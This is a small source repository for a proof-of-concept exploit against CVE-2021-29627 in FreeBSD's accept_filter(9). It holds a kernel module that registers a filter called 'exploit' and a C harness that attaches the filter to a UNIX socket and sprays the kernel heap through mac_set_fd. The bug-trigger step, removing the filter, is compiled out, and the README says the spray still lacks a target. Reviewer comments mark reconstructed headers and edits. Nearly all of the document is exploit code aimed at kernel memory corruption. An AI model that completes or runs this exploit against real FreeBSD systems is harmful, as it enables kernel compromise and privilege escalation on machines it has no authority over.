├── mod
│   ├── Makefile
│   └── accept_filter_mod.c
├── README.md
├── LICENSE.md
└── exploit
    └── main.c

/mod/Makefile:
--------------------------------------------------------------------------------
# Builds mod/accept_filter_mod.c as the kernel module "exploit.ko".
KMOD=	exploit
SRCS=	accept_filter_mod.c

# Standard FreeBSD kernel-module glue (the include target was lost in
# extraction and is reconstructed here; KMOD/SRCS are bsd.kmod.mk variables).
.include <bsd.kmod.mk>
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2021-29627

Proof-of-concept code for CVE-2021-29627 (FreeBSD accept_filter(9)): a minimal
accept-filter kernel module (`mod/`) plus a userland harness (`exploit/main.c`)
that attaches the filter to a listening socket and performs a
mac_set_fd(3)-based heap spray.

The spray still needs a target object to land on, so the step that actually
triggers the bug (removing the filter again) is kept disabled in
`exploit/main.c`. Load `mod/exploit.ko` before running the harness.
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004

Copyright (c) 2021, Karsten König grayfox@outerhaven.de


Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.

DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

0. You just DO WHAT THE FUCK YOU WANT TO.
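--------------------------------------------------------------------------------
/mod/accept_filter_mod.c:
--------------------------------------------------------------------------------
/*
 * mod/accept_filter_mod.c
 *
 * Minimal accept_filter(9) module used by exploit/main.c.  It registers a
 * filter named "exploit" (the name main.c writes into accept_filter_arg.af_name)
 * so that a listening socket can have an accept filter attached and later
 * removed.  The readiness callback is the same as accf_data(9)'s.
 *
 * NOTE(review): the header names were lost when this page was extracted; the
 * list below is reconstructed from the symbols the file uses
 * (ACCEPT_FILTER_DEFINE, soreadable, SU_OK/SU_ISCONNECTED live in
 * <sys/socketvar.h>; the module plumbing needs <sys/kernel.h>/<sys/module.h>).
 */
#include <sys/cdefs.h>
__FBSDID("$FreeBSD$");

#define ACCEPT_FILTER_MOD

#include <sys/param.h>
#include <sys/kernel.h>
#include <sys/module.h>
#include <sys/socket.h>
#include <sys/socketvar.h>

static int	 sohasdata(struct socket *so, void *arg, int waitflag);
static void	*create_stub(struct socket *so, char *arg);

/*
 * Register the filter.  A create hook is supplied (create_stub) but no destroy
 * hook, so nothing ever tries to free the sentinel argument create_stub hands
 * back.  Version 1.
 */
ACCEPT_FILTER_DEFINE(accf_exploit, "exploit", sohasdata, create_stub, NULL, 1);

/*
 * Accept-filter upcall.  Keep the connection on the incomplete queue (SU_OK)
 * until the socket is readable, then release it to accept(2) (SU_ISCONNECTED).
 * 'arg' (the create_stub sentinel) and 'waitflag' are not used.
 */
static int
sohasdata(struct socket *so, void *arg, int waitflag)
{

	if (!soreadable(so))
		return (SU_OK);

	return (SU_ISCONNECTED);
}

/*
 * Filter "create" hook.  Returns a non-NULL sentinel instead of an allocation.
 *
 * NOTE(review): non-NULL presumably because the socket layer treats a NULL
 * create result as failure — confirm against the target kernel.  The value is
 * never a valid pointer and must never be dereferenced or freed; the missing
 * destroy hook above is what keeps the kernel from doing the latter.
 */
static void *
create_stub(struct socket *so, char *arg)
{

	return ((void *)1);
}
--------------------------------------------------------------------------------
/exploit/main.c:
--------------------------------------------------------------------------------
/*
 * exploit/main.c
 *
 * PoC harness for CVE-2021-29627 (FreeBSD accept_filter(9)).
 *
 * Flow: create an AF_UNIX stream socket, bind/listen on TARGET_SOCK_PATH,
 * attach the "exploit" accept filter (mod/accept_filter_mod.c), run a
 * mac_set_fd(3)-based heap spray and then — currently compiled out, see
 * main() — remove the filter again, which is the step this code treats as the
 * bug trigger.  The README notes that the spray has no target yet, which is
 * why the trigger stays disabled.
 *
 * Fixes relative to the original listing: prepare_mac_spray_buf() wrote 16
 * bytes into an 8-byte allocation and ignored its length parameter; the
 * accept_filter_arg / sockaddr_un structs were passed to the kernel with
 * uninitialized padding; allocations were neither checked nor freed; and
 * main() exited 1 even when every step succeeded.
 *
 * NOTE(review): include list reconstructed from the symbols used; the original
 * header names were lost in extraction.
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/mac.h>

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TARGET_SOCK_PATH	"/tmp/exploit"
#define N_SPRAY_SOCKETS		8
/* Size (incl. NUL) of the label string handed to mac_set_fd() per spray. */
#define DEFAULT_SPRAY_BUF_LEN	16

/*
 * Print a failure line (stdout, as the original did) followed by
 * perror("Reason") on stderr.  errno is saved across printf(3), which may
 * clobber it and would otherwise make the "Reason" misleading.
 */
static void
report_failure(const char *msg)
{
	int saved_errno = errno;

	printf("%s\n", msg);
	errno = saved_errno;
	perror("Reason");
}

/*
 * Create the stream socket the accept filter will be attached to.
 * Returns the descriptor, or -1 with errno set (socket(2)).
 */
int
new_target_socket(void)
{
	return (socket(AF_UNIX, SOCK_STREAM, 0));
}

/*
 * Allocate the label string used by the mac_set_fd() spray: buf_len bytes,
 * filled with 'A' and NUL-terminated, so the kernel copies exactly buf_len
 * bytes.  Ownership of *buf passes to the caller (free(3) it).
 *
 * Returns buf_len on success, 0 on failure (*buf is then NULL).  buf_len must
 * be at least 2 (one payload byte plus the terminator).
 */
size_t
prepare_mac_spray_buf(uint8_t **buf, size_t buf_len)
{
	if (buf == NULL)
		return (0);
	*buf = NULL;

	if (buf_len < 2)
		return (0);

	*buf = calloc(buf_len, sizeof(**buf));
	if (*buf == NULL)
		return (0);

	/* Leave the last byte as the NUL terminator calloc already wrote. */
	memset(*buf, 'A', buf_len - 1);
	return (buf_len);
}

/*
 * One spray step: wrap 'buf' in a struct mac and call mac_set_fd() on fd -1.
 * The call is expected to fail (there is no such descriptor); the point is the
 * kernel-side handling of m_string that happens before the descriptor lookup.
 * For that reason mac_set_fd()'s return value is deliberately not propagated:
 * main() treats -1 as "abort", and -1 is the normal outcome here.
 *
 * Returns 0, or -1 if the arguments are unusable or struct mac could not be
 * allocated.  'buf' stays owned by the caller.
 *
 * NOTE(review): that a failing mac_set_fd() still performs the kernel
 * allocation this spray relies on is an assumption of the PoC — confirm
 * against the target kernel's __mac_set_fd implementation.
 */
int
mac_set_fd_spray(uint8_t *buf, size_t buf_len)
{
	mac_t mac;

	if (buf == NULL || buf_len == 0)
		return (-1);

	mac = calloc(1, sizeof(*mac));
	if (mac == NULL)
		return (-1);

	mac->m_buflen = buf_len;
	mac->m_string = (char *)buf;
	(void)mac_set_fd(-1, mac);

	/* The label is consumed during the call; nothing keeps a reference. */
	free(mac);
	return (0);
}

/*
 * Attach the "exploit" accept filter (the name registered by
 * mod/accept_filter_mod.c) to a listening socket.
 * Returns setsockopt(2)'s result: 0 or -1 with errno set.
 */
int
set_filter_on_socket(int socket)
{
	/* Zero the whole struct: sizeof(arg) bytes are copied into the kernel. */
	struct accept_filter_arg arg = { 0 };

	snprintf(arg.af_name, sizeof(arg.af_name), "%s", "exploit");
	return (setsockopt(socket, SOL_SOCKET, SO_ACCEPTFILTER, &arg,
	    sizeof(arg)));
}

/*
 * Remove the accept filter from the socket (SO_ACCEPTFILTER with a NULL,
 * zero-length value).  This is the step main() identifies as the bug trigger.
 * Returns setsockopt(2)'s result: 0 or -1 with errno set.
 */
int
delete_filter_on_socket(int socket)
{
	return (setsockopt(socket, SOL_SOCKET, SO_ACCEPTFILTER, NULL, 0));
}

/*
 * Bind the socket to TARGET_SOCK_PATH and put it into the listening state
 * (backlog 1).  A stale socket file from an earlier run is unlinked first,
 * since it would make bind(2) fail with EADDRINUSE.
 * Returns 0 on success, -1 after printing which step failed (errno is left
 * intact for the caller's perror).
 */
int
make_socket_listening(int socket)
{
	struct sockaddr_un sockaddr = { 0 };

	sockaddr.sun_family = AF_UNIX;
	/* TARGET_SOCK_PATH is a short constant, but bound the copy anyway. */
	snprintf(sockaddr.sun_path, sizeof(sockaddr.sun_path), "%s",
	    TARGET_SOCK_PATH);

	(void)unlink(TARGET_SOCK_PATH);
	if (bind(socket, (struct sockaddr *)&sockaddr, sizeof(sockaddr)) == -1) {
		printf("[!] Bind failed\n");
		return (-1);
	}

	if (listen(socket, 1) == -1) {
		printf("[!] Listen failed\n");
		return (-1);
	}
	return (0);
}

/*
 * Entry point.  Exit status 0 if every enabled step succeeded, 1 otherwise
 * (the original returned 1 unconditionally).  All resources are released on
 * the common exit path.
 */
int
main(void)
{
	int target_socket;
	uint8_t *spray_buf = NULL;
	size_t spray_buf_len;
	int rc = 1;

	target_socket = new_target_socket();
	if (target_socket == -1) {
		report_failure("[!] Could not create target socket");
		return (1);
	}
	printf("[+] target_socket: %d\n", target_socket);

	if (make_socket_listening(target_socket) == -1) {
		report_failure("[!] Could not listen on target_socket");
		goto fail;
	}

	if (set_filter_on_socket(target_socket) == -1) {
		report_failure("[!] Could not set accept filter on target_socket");
		goto fail;
	}

	spray_buf_len = prepare_mac_spray_buf(&spray_buf, DEFAULT_SPRAY_BUF_LEN);
	if (spray_buf_len == 0) {
		printf("[!] Could not allocate spray buffer\n");
		goto fail;
	}
	printf("[+] spray_buf_len: %zu\n", spray_buf_len);

	if (mac_set_fd_spray(spray_buf, spray_buf_len) == -1)
		goto fail;

#if 0
	/*
	 * Bug trigger: removing the filter again.  Kept compiled out because
	 * the spray above has no target object yet (see README); enable once
	 * it does.
	 */
	if (delete_filter_on_socket(target_socket) == -1) {
		report_failure("[!] Could not trigger accept filter bug on target_socket");
		goto fail;
	}
#endif
	rc = 0;

fail:
	free(spray_buf);
	close(target_socket);
	(void)unlink(TARGET_SOCK_PATH);
	return (rc);
}
--------------------------------------------------------------------------------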